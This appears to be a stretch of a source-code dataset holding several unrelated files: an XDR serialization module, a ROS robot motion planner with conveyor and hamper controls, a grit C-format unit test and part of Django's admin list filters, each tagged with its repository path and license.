for entry in po:
lines2.append(' "{0}": "{1}",'. format(entry.msgid, entry.msgstr))
lines.extend(sorted(lines2))
lines.append("}\n")
print("Generating:", outf)
with io.open(outf, "w+", encoding="utf8") as outfile:
outfile.write('\n'.join(lines))
| mit |
RiccardoPecora/MP | Lib/xdrlib.py | 55 | 5794 | """Implements (a subset of) Sun XDR -- eXternal Data Representation.
See: RFC 1014
"""
import struct
try:
from cStringIO import StringIO as _StringIO
except ImportError:
from StringIO import StringIO as _StringIO
__all__ = ["Error", "Packer", "Unpacker", "ConversionError"]
# exceptions
class Error(Exception):
"""Exception class for this module. Use:
except xdrlib.Error, var:
# var has the Error instance for the exception
Public ivars:
msg -- contains the message
"""
def __init__(self, msg):
self.msg = msg
def __repr__(self):
return repr(self.msg)
def __str__(self):
return str(self.msg)
class ConversionError(Error):
pass
class Packer:
"""Pack various data representations into a buffer."""
def __init__(self):
self.reset()
def reset(self):
self.__buf = _StringIO()
def get_buffer(self):
return self.__buf.getvalue()
# backwards compatibility
get_buf = get_buffer
def pack_uint(self, x):
self.__buf.write(struct.pack('>L', x))
def pack_int(self, x):
self.__buf.write(struct.pack('>l', x))
pack_enum = pack_int
def pack_bool(self, x):
if x: self.__buf.write('\0\0\0\1')
else: self.__buf.write('\0\0\0\0')
def pack_uhyper(self, x):
self.pack_uint(x>>32 & 0xffffffffL)
self.pack_uint(x & 0xffffffffL)
pack_hyper = pack_uhyper
def pack_float(self, x):
try: self.__buf.write(struct.pack('>f', x))
except struct.error, msg:
raise ConversionError, msg
def pack_double(self, x):
try: self.__buf.write(struct.pack('>d', x))
except struct.error, msg:
raise ConversionError, msg
def pack_fstring(self, n, s):
if n < 0:
raise ValueError, 'fstring size must be nonnegative'
data = s[:n]
n = ((n+3)//4)*4
data = data + (n - len(data)) * '\0'
self.__buf.write(data)
pack_fopaque = pack_fstring
def pack_string(self, s):
n = len(s)
self.pack_uint(n)
self.pack_fstring(n, s)
pack_opaque = pack_string
pack_bytes = pack_string
def pack_list(self, list, pack_item):
for item in list:
self.pack_uint(1)
pack_item(item)
self.pack_uint(0)
def pack_farray(self, n, list, pack_item):
if len(list) != n:
raise ValueError, 'wrong array size'
for item in list:
pack_item(item)
def pack_array(self, list, pack_item):
n = len(list)
self.pack_uint(n)
self.pack_farray(n, list, pack_item)
class Unpacker:
"""Unpacks various data representations from the given buffer."""
def __init__(self, data):
self.reset(data)
def reset(self, data):
self.__buf = data
self.__pos = 0
def get_position(self):
return self.__pos
def set_position(self, position):
self.__pos = position
def get_buffer(self):
return self.__buf
def done(self):
if self.__pos < len(self.__buf):
raise Error('unextracted data remains')
def unpack_uint(self):
i = self.__pos
self.__pos = j = i+4
data = self.__buf[i:j]
if len(data) < 4:
raise EOFError
x = struct.unpack('>L', data)[0]
try:
return int(x)
except OverflowError:
return x
def unpack_int(self):
i = self.__pos
self.__pos = j = i+4
data = self.__buf[i:j]
if len(data) < 4:
raise EOFError
return struct.unpack('>l', data)[0]
unpack_enum = unpack_int
def unpack_bool(self):
return bool(self.unpack_int())
def unpack_uhyper(self):
hi = self.unpack_uint()
lo = self.unpack_uint()
return long(hi)<<32 | lo
def unpack_hyper(self):
x = self.unpack_uhyper()
if x >= 0x8000000000000000L:
x = x - 0x10000000000000000L
return x
def unpack_float(self):
i = self.__pos
self.__pos = j = i+4
data = self.__buf[i:j]
if len(data) < 4:
raise EOFError
return struct.unpack('>f', data)[0]
def unpack_double(self):
i = self.__pos
self.__pos = j = i+8
data = self.__buf[i:j]
if len(data) < 8:
raise EOFError
return struct.unpack('>d', data)[0]
def unpack_fstring(self, n):
if n < 0:
raise ValueError, 'fstring size must be nonnegative'
i = self.__pos
j = i + (n+3)//4*4
if j > len(self.__buf):
raise EOFError
self.__pos = j
return self.__buf[i:i+n]
unpack_fopaque = unpack_fstring
def unpack_string(self):
n = self.unpack_uint()
return self.unpack_fstring(n)
unpack_opaque = unpack_string
unpack_bytes = unpack_string
def unpack_list(self, unpack_item):
list = []
while 1:
x = self.unpack_uint()
if x == 0: break
if x != 1:
raise ConversionError, '0 or 1 expected, got %r' % (x,)
item = unpack_item()
list.append(item)
return list
def unpack_farray(self, n, unpack_item):
list = []
for i in range(n):
list.append(unpack_item())
return list
def unpack_array(self, unpack_item):
n = self.unpack_uint()
return self.unpack_farray(n, unpack_item)
| gpl-3.0 |
WeirdCoder/rss-2014-team-3 | src/robotbrain/src/motionplanner.py | 1 | 19846 | import rospy
import math
import time
from gc_msgs.msg import ConveyorMsg
from gc_msgs.msg import HamperMsg
from gc_msgs.msg import EncoderMsg
from gc_msgs.msg import MotionMsg
from gc_msgs.msg import WheelErrorMsg
from gc_msgs.msg import MotionDistMsg
from gc_msgs.msg import StateMsg
#
# This class is used by the RobotBrain to send PWM messages to the HAL to control the motion of the motors. This includes both wheel motors and theconveyor belt motors. Also has methods to abstract some elements of motor control; has proportional control for the wheels
#
#TODO: have HAL calculate and send current wheel angular velocities?
class MotionPlanner(object):
def __init__(self, startTime, dumpTime):
# kept updated to reflect robot status
self.currentWheelVel = [0.,0.]; # has current velocities of each wheel in m/s
self.currentWheelDist = [0., 0.]; # used for calculating velocity of each wheel
self.previousDesiredAngVel = 0.
self.previousDesiredTransVel = 0.
self.currentTransVel = 0.
self.currentAngVel = 0.
self.lastEncoderMsgTime = time.clock() # time in seconds. Used for calculating current wheel velocities
self.wheelError = 0.
# timing constants used to ensure that robot stops everything near end of run and dumps current blocks
self.startTime = startTime
self.dumpTime = dumpTime
# constants for wheel motion
# TODO: pick appropriate vales
self.MAX_TRANS_ACCEL = .00001; # maximum translation acceleration in m/s^2
self.MAX_ANG_ACCEL = .0001; # maximum rotational acceleration in rad/s^2
self.ANGULAR_ERR = .01; # acceptable angular error in radians
self.TRANS_ERR = 0.005; # acceptable translation error in m
self.MAX_WHEEL_ANG_VEL = 0.2;#was 1 # maximum angular velocity of wheels in rad/s
self.WHEELBASE = .375; # distance from origin to wheel; similar to a robot radius
self.LEFT_WHEEL = 0; # for indexing into leftWheel, rightWheel tuples
self.RIGHT_WHEEL = 1;
# intialize publishers, subscribers
self.statePub = rospy.Publisher('command/State', StateMsg);
self.conveyorPub = rospy.Publisher("/command/Conveyor", ConveyorMsg);
self.hamperPub = rospy.Publisher("/command/Hamper", HamperMsg);
self.encoderSub = rospy.Subscriber('/sensor/Encoder', EncoderMsg, self.handleEncoderMsg);
self.motionPub = rospy.Publisher("/command/Motors", MotionMsg);
self.positionPub = rospy.Publisher("/command/MotorsDist", MotionDistMsg);
self.errorSub = rospy.Subscriber("/sensor/WheelErr", WheelErrorMsg, self.handleWheelErrMsg);
return
#################################
# Publishers/Subscriber Methods #
#################################
def restartHAL(self):
msg = StateMsg()
msg.state = "init"
self.statePub.publish(msg)
return
# params: wheel error msg
# returns: none
# updates self.wheelError from message contents - how far wheels have left to travel
def handleWheelErrMsg(self, msg):
self.wheelError = .5*(abs(msg.leftWheelError) + abs(msg.rightWheelError))
return
# params: EncoderMsg msg
# returns: none
# calculates current rWheelVel and lWheelVel from encoder message
# assumes encoder message fixes signs so dist is positive when both wheels are moving forward
def handleEncoderMsg(self, msg):
# calculating how much the wheels have moved in the past time step, updating
newDist = [msg.lWheelDist, msg.rWheelDist]; # current tick positions of the wheels
deltaDist = [newDist[self.LEFT_WHEEL] - self.currentWheelDist[self.LEFT_WHEEL], newDist[self.RIGHT_WHEEL]-self.currentWheelDist[self.RIGHT_WHEEL]];
self.currentWheelDist = newDist
# calculating how much time has passed, updating time
currentTime = time.clock();
deltaTime = currentTime - self.lastEncoderMsgTime;
self.lastEncoderMsgTime = currentTime;
# calculate and update the currentWheelAngVel parameter
if (deltaTime > 0.):
self.updateCurrentVel(deltaDist, deltaTime);
return
#################
# Wheel motion ##
#################
# params: currentPose: pose containing current location of robot
# destinationPose: pose containing desination of robot (angle is 0)
# angVel: float angular velocity in rad/s
# vel; float velocity in m/s
# returns: boolean: true when motion is complete
# using rotateTowards and translateTowards, first rotates to face destination and then translates to it
def travelTowards(self, currentPose, destinationLoc, angVel, vel):
angleToDestination = math.atan2((destinationLoc.getY()-currentPose.getY()),(destinationLoc.getX()-currentPose.getX()));
# if not currently facing the destination, rotate towards it so can translate there in a straight line
# rotateTowards will not move if close enough
doneRotating = self.rotateTowards(currentPose.getAngle(), angleToDestination, angVel)
if doneRotating:
# if the robot is facing the destination, move towards it
doneTravelling = self.translateTowards(currentPose, destinationLoc, vel);
return doneTravelling;
# if not done rotating, not done travelling
else:
return False
# params: currentAngle: float currentAngle in radians
# destAngle: float destination angle in radians
# angSpeed: float angular speed in rad/s
# returns: boolean: true when motion is complete
# Calculates appropriate rotational speed using proportional control (accelerates and deacellerates
# based on distance to currentLoc. Calls rotate.
def rotateTowards(self, currentAngle, destAngle, angSpeed):
# calculating distance left to rotate; from [-pi, pi]
distanceLeft = destAngle - currentAngle;
# want distance left [-pi, pi]
if distanceLeft > math.pi:
distanceLeft = distanceLeft - 2*math.pi
elif distanceLeft < -math.pi:
distanceLeft = distanceLeft + 2*math.pi
# if are close enough already, don't move and return true
if abs(distanceLeft) < self.ANGULAR_ERR:
self.rotate(0.)
return True
# maximum current velocity is related to distanceLeft and acceleration
# Want to deaccelerate to 0 when distanceLeft = 0. Hence the cap
# v(t) = a*t
# d(t) = .5a**2
# t = sqrt(dist/.5a**2)
# vmax = a*t = a*sqrt(distLeft/.5a**2)
# speed is minimum of maxSpeed(distance), speed given, speed from accelerating
currentMaxSpeed = self.MAX_ANG_ACCEL*math.sqrt(abs(distanceLeft)/(.5*self.MAX_ANG_ACCEL**2))
acceleratedSpeed = abs(self.previousDesiredAngVel + math.copysign(self.MAX_ANG_ACCEL, distanceLeft))
desiredSpeed = min(currentMaxSpeed, angSpeed, acceleratedSpeed)
# moving in direction of distanceLeft
desiredAngVel = math.copysign(desiredSpeed, distanceLeft)
self.previousDesiredAngVel = desiredAngVel
self.rotate(desiredAngVel);
# still have more rotating to do
return False
# params: currentPose: Pose currentLocation
# destination: Pose destination
# speed: fload desired speed of motion in m/s
# startPose: Pose robot held when motion was started
# returns: void
# Calculates appropriate translational speed using proportional control (accelerates and deacellerates
# based on distance to currentLoc. Calls translate
# assumes that robot is facing desination
def translateTowards(self, currentPose, destination, speed):
# calculating the magnitude and sign of the distance from currentLocation to desination
currentDistanceVector = (destination.getX() - currentPose.getX(), destination.getY() - currentPose.getY());
distanceMagnitude = math.sqrt(currentDistanceVector[0]**2 + currentDistanceVector[1]**2);
currentAngleVector = (math.cos(currentPose.getAngle()), math.sin(currentPose.getAngle()));
# if currentDistanceVector dot currentAngleVector is positive, then need to move forward
# otherwise, need to move backwards, so distance will be negative
dotProduct = currentDistanceVector[0]*currentAngleVector[0] + currentDistanceVector[1]*currentAngleVector[1];
velocitySign = math.copysign(1, dotProduct);
# if are close enough already, don't move and return true
if abs(distanceMagnitude) < self.TRANS_ERR:
self.translate(0.)
return True
# maximum current velocity is related to distanceLeft and acceleration
# Want to deaccelerate to 0 when distanceLeft = 0. Hence the cap
# v(t) = a*t
# d(t) = .5a**2
# t = sqrt(dist/.5a**2)
# vmax = a*t = a*sqrt(distLeft/.5a**2)
# speed is minimum of maxSpeed(distance), speed given, speed from accelerating
currentMaxSpeed = self.MAX_TRANS_ACCEL*math.sqrt(distanceMagnitude/(.5*self.MAX_TRANS_ACCEL**2))
acceleratedSpeed = abs(self.previousDesiredTransVel + math.copysign(self.MAX_TRANS_ACCEL, velocitySign))
desiredSpeed = min(currentMaxSpeed, speed, acceleratedSpeed)
# moving in direction of distanceLeft
desiredTransVel = math.copysign(desiredSpeed, velocitySign)
self.previousDesiredTransVel = desiredTransVel
self.translate(desiredTransVel);
# still have more rotating to do
return False
# OLD CODE
# calculating the magnitude of the velocity
# if within slow-down region (less than .5*a^2 from destination and at least halfway there), use velocity proportional to distance
#currentTransVelocity = .5*self.WHEEL_RADIUS*(self.currentWheelAngVel[self.LEFT_WHEEL] + self.currentWheelAngVel[self.RIGHT_WHEEL]);
#if (distanceMagnitude < .5*self.MAX_WHEEL_TRANS_ACCEL**2) and (distanceMagnitude/startDistance < .5):
# desiredVelocity = velocitySign*distanceMagnitude/self.MAX_WHEEL_TRANS_ACCEL;
# otherwise, if less than the desired velocity, accelerate
#elif abs(currentTransVelocity) < speed:
# desiredVelocity = currentTransVelocity + velocitySign*self.MAX_WHEEL_TRANS_ACCEL;
# otherwise, want to keep traveling at the desired velocity
#else:
# desiredVelocity = velocitySign*speed;
#self.translate(desiredVelocity);
#return
# params: angVelocity: float angular velocity in rad/s
# returns: void
# sends MotionControl message to rotate
def rotate(self, angVelocity):
msg = MotionMsg();
msg.translationalVelocity = 0.0;
msg.rotationalVelocity = angVelocity;
self.motionPub.publish(msg);
return
# params: velocity: float translational velocity in m/s
# returns: void
# sends MotionControl message to translate
def translate(self, velocity):
# send MotionControl Message
msg = MotionMsg();
msg.translationalVelocity = velocity;
msg.rotationalVelocity = 0;
self.motionPub.publish(msg);
return
# params: none
# returns: none
# sends MotionMsg stopping both wheels
def stopWheels(self):
self.restartHAL()
#self.previousDesiredAngVel = 0;
#self.previousDesiredTransVel = 0;
#msg = MotionMsg();
#msg.translationalVelocity = 0;
#msg.rotationalVelocity = 0;
#self.motionPub.publish(msg);
return
# param: angularVel: float angular velocity of robot in rad/s
# returns: float translational velocity for right wheel
# converts angular velocity of robot to translational velocity of right wheel based on robot radius
def convertAngVelToVel(self, angularVel):
return angularVel*self.WHEELBASE;
# param: angVel: angluar velocity of wheel in rad/s
# returns: PWM (0-255) to achieve velocity
# (the 'flipping' of one wheel's velocity is handled in the HAL)
def convertAngVelToPWM(self, angVel):
return angVel/self.MAX_WHEEL_ANG_VEL * self.MAX_PWM;
# params: deltaDists: int[] [new distance on left wheel, new distance on right wheel] in m
# deltaTime: float, time elapsed in which wheels have progressed by deltaDist
# returns: void
# calculates the current anglar velocity of each wheel and updates global variable currentWheelAngVel[]
def updateCurrentVel(self, deltaDist, deltaTime):
# calculating velocity of each wheel
self.currentWheelVel[self.LEFT_WHEEL] = deltaDist[self.LEFT_WHEEL]/deltaTime
self.currentWheelVel[self.RIGHT_WHEEL] = deltaDist[self.RIGHT_WHEEL]/deltaTime
# calculating translational velocity by averaging
self.currentTransVel = .5*(self.currentWheelVel[self.LEFT_WHEEL] + self.currentWheelVel[self.RIGHT_WHEEL]) # average
# calculating rotational velocity by taking the difference and dividing by wheel base
# turning to the left is positive angle - when left wheel is moving backwards
self.currentAngVel = .5*(self.currentWheelVel[self.RIGHT_WHEEL] - self.currentWheelVel[self.LEFT_WHEEL])/self.WHEELBASE
return
##########################
# Wheel position methods #
##########################
# These methods use the positional controller in the HAL code
#params: Pose currentPose current pose of robot
# Location location destination
# returns: none
# travels to given point.
def travelTo(self, currentPose, destination):
print 'inside travelTo'
currentDistanceVector = (destination.getX() - currentPose.getX(), destination.getY() - currentPose.getY());
angleToDestination = math.atan2((destination.getY()-currentPose.getY()),(destination.getX()-currentPose.getX())) - currentPose.getAngle();
print 'angle to dest', angleToDestination
# want angleToDestination [-pi, pi]
if angleToDestination > math.pi:
angleToDestination = angleToDestination - 2*math.pi
elif angleToDestination < -math.pi:
angleToDestination = angleToDestination + 2*math.pi
distanceMagnitude = math.sqrt(currentDistanceVector[0]**2 + currentDistanceVector[1]**2);
print 'angle', angleToDestination
print 'distance', distanceMagnitude
# turn to face destination point
print 'calling rotateTo'
self.restartHAL()
self.rotateTo(angleToDestination)
print 'wheelErr', self.wheelError
# wait for wheel error message to get sent
# and then wait until done rotating
time.sleep(0.01)
print 'wheelErrPostTime', self.wheelError
while (self.wheelError > self.ANGULAR_ERR):
# do nothing and wait for wheels to turn
# unless time is greater than dumpTime, in which case, return.
if (time.time() - self.startTime >= self.dumpTime):
return
print 'done turning'
self.restartHAL()
# wait between turning and translating, for i term i wheel control to catch up, so don't turn and translate
whileStartTime = time.time()
while ((time.time()-whileStartTime < 5.0) and (time.time()-self.startTime < self.dumpTime)):
pass
print 'start travel'
self.translateTo(distanceMagnitude)
time.sleep(.01) # wait for wheel error message to get sent
while(self.wheelError > self.TRANS_ERR):
# do nothing and wait for wheels to turn
# unless time is greater than dumpTime, in which case, return.
if (time.time() - self.startTime >= self.dumpTime):
return
print 'done translating'
return
# params: angle to turn to
# returns: none
# send message to wheel controller to turn
def rotateTo(self, angle):
print 'sending message'
print 'angle', angle
msg = MotionDistMsg()
msg.translationalDist = 0
msg.rotationalDist = angle
print msg.rotationalDist
self.positionPub.publish(msg)
print 'message sent'
return
# params: distance to travel
# returns: none
# send message to wheel controller to translate distance
def translateTo(self, distance):
msg = MotionDistMsg()
msg.translationalDist = distance
msg.rotationalDist = 0
self.positionPub.publish(msg)
return
##########################
## Conveyor Belt Motion ##
##########################
# params: none
# returns: none
# sends messages to start the conveyor belts that consume blocks at default speed
def startEatingBelts(self):
# tell right conveor motor to start at standard speed
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 1
msg.backConveyorFractionOn = 1
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to start both conveyor belts
def startBothBelts(self):
# tell right conveor motor to start at standard speed
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 1
msg.backConveyorFractionOn = 1
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to start both conveyor belts
def startBothBelts(self):
# tell right conveor motor to start at standard speed
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 1.0
msg.backConveyorFractionOn = 1.0
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to reverse conveyor belts that consumes blocks
def reverseEatingBelts(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = -.1
msg.backConveyorFractionOn = 0.0
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to stop the conveyor belts that consume blocks
def stopConveyorBelts(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 0.0
msg.backConveyorFractionOn = 0.0
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to start the conveyor belt that moves blocks within the hamper
def startHamperBelt(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 0.0
msg.backConveyorFractionOn = .1
self.conveyorPub.publish(msg)
return
# params: none
# returns: none
# sends messages to start the conveyor belt that moves blocks within the hamper
def reverseHamperBelt(self):
msg = ConveyorMsg()
msg.frontConveyorFractionOn = 0.0
msg.backConveyorFractionOn = -.1
self.conveyorPub.publish(msg)
return
#################
# Hamper motion #
#################
# params: angle, in radians, that hamper should be set to
# returns: none
# sets hamper to desired angle. This is the angle to vertical; hamper is closed at 0 and open at pi/2
def setHamperAngle(self, angle):
fractionOpen = angle/(math.pi/2.0)
msg = HamperMsg()
msg.fractionOpen = fractionOpen
self.hamperPub.publish(msg)
pass
| mit |
joisig/grit-i18n | grit/format/c_format_unittest.py | 61 | 1968 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittest for c_format.py.
"""
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
import StringIO
from grit import util
from grit.tool import build
class CFormatUnittest(unittest.TestCase):
def testMessages(self):
root = util.ParseGrdForUnittest("""
<messages>
<message name="IDS_QUESTIONS">Do you want to play questions?</message>
<message name="IDS_QUOTES">
"What's in a name, <ph name="NAME">%s<ex>Brandon</ex></ph>?"
</message>
<message name="IDS_LINE_BREAKS">
Was that rhetoric?
No.
Statement. Two all. Game point.
</message>
<message name="IDS_NON_ASCII">
\xc3\xb5\\xc2\\xa4\\\xc2\xa4\\\\xc3\\xb5\xe4\xa4\xa4
</message>
</messages>
""")
buf = StringIO.StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('c_format', 'en'), buf)
output = util.StripBlankLinesAndComments(buf.getvalue())
self.assertEqual(u"""\
#include "resource.h"
const char* GetString(int id) {
switch (id) {
case IDS_QUESTIONS:
return "Do you want to play questions?";
case IDS_QUOTES:
return "\\"What\\'s in a name, %s?\\"";
case IDS_LINE_BREAKS:
return "Was that rhetoric?\\nNo.\\nStatement. Two all. Game point.";
case IDS_NON_ASCII:
return "\\303\\265\\xc2\\xa4\\\\302\\244\\\\xc3\\xb5\\344\\244\\244";
default:
return 0;
}
}""", output)
class DummyOutput(object):
def __init__(self, type, language):
self.type = type
self.language = language
def GetType(self):
return self.type
def GetLanguage(self):
return self.language
def GetOutputFilename(self):
return 'hello.gif'
if __name__ == '__main__':
unittest.main()
| bsd-2-clause |
deandunbar/html2bwml | venv/lib/python2.7/site-packages/django/contrib/admin/filters.py | 70 | 16602 | """
This encapsulates the logic for displaying filters in the Django admin.
Filters are specified in models with the "list_filter" option.
Each filter subclass knows how to display a filter for a field that passes a
certain test -- e.g. being a DateField or ForeignKey.
"""
import datetime
from django.db import models
from django.core.exceptions import ImproperlyConfigured, ValidationError
from django.utils.encoding import smart_text, force_text
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib.admin.utils import (get_model_from_relation,
reverse_field_path, get_limit_choices_to_from_path, prepare_lookup_value)
from django.contrib.admin.options import IncorrectLookupParameters
class ListFilter(object):
title = None # Human-readable title to appear in the right sidebar.
template = 'admin/filter.html'
def __init__(self, request, params, model, model_admin):
# This dictionary will eventually contain the request's query string
# parameters actually used by this filter.
self.used_parameters = {}
if self.title is None:
raise ImproperlyConfigured(
"The list filter '%s' does not specify "
"a 'title'." % self.__class__.__name__)
def has_output(self):
"""
Returns True if some choices would be output for this filter.
"""
raise NotImplementedError('subclasses of ListFilter must provide a has_output() method')
def choices(self, cl):
"""
Returns choices ready to be output in the template.
"""
raise NotImplementedError('subclasses of ListFilter must provide a choices() method')
def queryset(self, request, queryset):
"""
Returns the filtered queryset.
"""
raise NotImplementedError('subclasses of ListFilter must provide a queryset() method')
def expected_parameters(self):
"""
Returns the list of parameter names that are expected from the
request's query string and that will be used by this filter.
"""
raise NotImplementedError('subclasses of ListFilter must provide an expected_parameters() method')
class SimpleListFilter(ListFilter):
# The parameter that should be used in the query string for that filter.
parameter_name = None
def __init__(self, request, params, model, model_admin):
super(SimpleListFilter, self).__init__(
request, params, model, model_admin)
if self.parameter_name is None:
raise ImproperlyConfigured(
"The list filter '%s' does not specify "
"a 'parameter_name'." % self.__class__.__name__)
if self.parameter_name in params:
value = params.pop(self.parameter_name)
self.used_parameters[self.parameter_name] = value
lookup_choices = self.lookups(request, model_admin)
if lookup_choices is None:
lookup_choices = ()
self.lookup_choices = list(lookup_choices)
def has_output(self):
return len(self.lookup_choices) > 0
def value(self):
"""
Returns the value (in string format) provided in the request's
query string for this filter, if any. If the value wasn't provided then
returns None.
"""
return self.used_parameters.get(self.parameter_name, None)
def lookups(self, request, model_admin):
"""
Must be overridden to return a list of tuples (value, verbose value)
"""
raise NotImplementedError(
'The SimpleListFilter.lookups() method must be overridden to '
'return a list of tuples (value, verbose value)')
def expected_parameters(self):
return [self.parameter_name]
def choices(self, cl):
yield {
'selected': self.value() is None,
'query_string': cl.get_query_string({}, [self.parameter_name]),
'display': _('All'),
}
for lookup, title in self.lookup_choices:
yield {
'selected': self.value() == force_text(lookup),
'query_string': cl.get_query_string({
self.parameter_name: lookup,
}, []),
'display': title,
}
class FieldListFilter(ListFilter):
_field_list_filters = []
_take_priority_index = 0
def __init__(self, field, request, params, model, model_admin, field_path):
self.field = field
self.field_path = field_path
self.title = getattr(field, 'verbose_name', field_path)
super(FieldListFilter, self).__init__(
request, params, model, model_admin)
for p in self.expected_parameters():
if p in params:
value = params.pop(p)
self.used_parameters[p] = prepare_lookup_value(p, value)
def has_output(self):
return True
def queryset(self, request, queryset):
try:
return queryset.filter(**self.used_parameters)
except ValidationError as e:
raise IncorrectLookupParameters(e)
@classmethod
def register(cls, test, list_filter_class, take_priority=False):
if take_priority:
# This is to allow overriding the default filters for certain types
# of fields with some custom filters. The first found in the list
# is used in priority.
cls._field_list_filters.insert(
cls._take_priority_index, (test, list_filter_class))
cls._take_priority_index += 1
else:
cls._field_list_filters.append((test, list_filter_class))
@classmethod
def create(cls, field, request, params, model, model_admin, field_path):
for test, list_filter_class in cls._field_list_filters:
if not test(field):
continue
return list_filter_class(field, request, params,
model, model_admin, field_path=field_path)
class RelatedFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
other_model = get_model_from_relation(field)
if hasattr(field, 'rel'):
rel_name = field.rel.get_related_field().name
else:
rel_name = other_model._meta.pk.name
self.lookup_kwarg = '%s__%s__exact' % (field_path, rel_name)
self.lookup_kwarg_isnull = '%s__isnull' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg)
self.lookup_val_isnull = request.GET.get(self.lookup_kwarg_isnull)
self.lookup_choices = field.get_choices(include_blank=False)
super(RelatedFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
if hasattr(field, 'verbose_name'):
self.lookup_title = field.verbose_name
else:
self.lookup_title = other_model._meta.verbose_name
self.title = self.lookup_title
def has_output(self):
if (isinstance(self.field, models.related.RelatedObject) and
self.field.field.null or hasattr(self.field, 'rel') and
self.field.null):
extra = 1
else:
extra = 0
return len(self.lookup_choices) + extra > 1
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg_isnull]
def choices(self, cl):
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
yield {
'selected': self.lookup_val is None and not self.lookup_val_isnull,
'query_string': cl.get_query_string({},
[self.lookup_kwarg, self.lookup_kwarg_isnull]),
'display': _('All'),
}
for pk_val, val in self.lookup_choices:
yield {
'selected': self.lookup_val == smart_text(pk_val),
'query_string': cl.get_query_string({
self.lookup_kwarg: pk_val,
}, [self.lookup_kwarg_isnull]),
'display': val,
}
if (isinstance(self.field, models.related.RelatedObject) and
self.field.field.null or hasattr(self.field, 'rel') and
self.field.null):
yield {
'selected': bool(self.lookup_val_isnull),
'query_string': cl.get_query_string({
self.lookup_kwarg_isnull: 'True',
}, [self.lookup_kwarg]),
'display': EMPTY_CHANGELIST_VALUE,
}
FieldListFilter.register(lambda f: (
bool(f.rel) if hasattr(f, 'rel') else
isinstance(f, models.related.RelatedObject)), RelatedFieldListFilter)
class BooleanFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '%s__exact' % field_path
self.lookup_kwarg2 = '%s__isnull' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_val2 = request.GET.get(self.lookup_kwarg2, None)
super(BooleanFieldListFilter, self).__init__(field,
request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg2]
def choices(self, cl):
for lookup, title in (
(None, _('All')),
('1', _('Yes')),
('0', _('No'))):
yield {
'selected': self.lookup_val == lookup and not self.lookup_val2,
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup,
}, [self.lookup_kwarg2]),
'display': title,
}
if isinstance(self.field, models.NullBooleanField):
yield {
'selected': self.lookup_val2 == 'True',
'query_string': cl.get_query_string({
self.lookup_kwarg2: 'True',
}, [self.lookup_kwarg]),
'display': _('Unknown'),
}
FieldListFilter.register(lambda f: isinstance(f,
(models.BooleanField, models.NullBooleanField)), BooleanFieldListFilter)
class ChoicesFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = '%s__exact' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg)
super(ChoicesFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg]
def choices(self, cl):
yield {
'selected': self.lookup_val is None,
'query_string': cl.get_query_string({}, [self.lookup_kwarg]),
'display': _('All')
}
for lookup, title in self.field.flatchoices:
yield {
'selected': smart_text(lookup) == self.lookup_val,
'query_string': cl.get_query_string({
self.lookup_kwarg: lookup}),
'display': title,
}
FieldListFilter.register(lambda f: bool(f.choices), ChoicesFieldListFilter)
class DateFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.field_generic = '%s__' % field_path
self.date_params = dict((k, v) for k, v in params.items()
if k.startswith(self.field_generic))
now = timezone.now()
# When time zone support is enabled, convert "now" to the user's time
# zone so Django's definition of "Today" matches what the user expects.
if timezone.is_aware(now):
now = timezone.localtime(now)
if isinstance(field, models.DateTimeField):
today = now.replace(hour=0, minute=0, second=0, microsecond=0)
else: # field is a models.DateField
today = now.date()
tomorrow = today + datetime.timedelta(days=1)
if today.month == 12:
next_month = today.replace(year=today.year + 1, month=1, day=1)
else:
next_month = today.replace(month=today.month + 1, day=1)
next_year = today.replace(year=today.year + 1, month=1, day=1)
self.lookup_kwarg_since = '%s__gte' % field_path
self.lookup_kwarg_until = '%s__lt' % field_path
self.links = (
(_('Any date'), {}),
(_('Today'), {
self.lookup_kwarg_since: str(today),
self.lookup_kwarg_until: str(tomorrow),
}),
(_('Past 7 days'), {
self.lookup_kwarg_since: str(today - datetime.timedelta(days=7)),
self.lookup_kwarg_until: str(tomorrow),
}),
(_('This month'), {
self.lookup_kwarg_since: str(today.replace(day=1)),
self.lookup_kwarg_until: str(next_month),
}),
(_('This year'), {
self.lookup_kwarg_since: str(today.replace(month=1, day=1)),
self.lookup_kwarg_until: str(next_year),
}),
)
super(DateFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg_since, self.lookup_kwarg_until]
def choices(self, cl):
for title, param_dict in self.links:
yield {
'selected': self.date_params == param_dict,
'query_string': cl.get_query_string(
param_dict, [self.field_generic]),
'display': title,
}
FieldListFilter.register(
lambda f: isinstance(f, models.DateField), DateFieldListFilter)
# This should be registered last, because it's a last resort. For example,
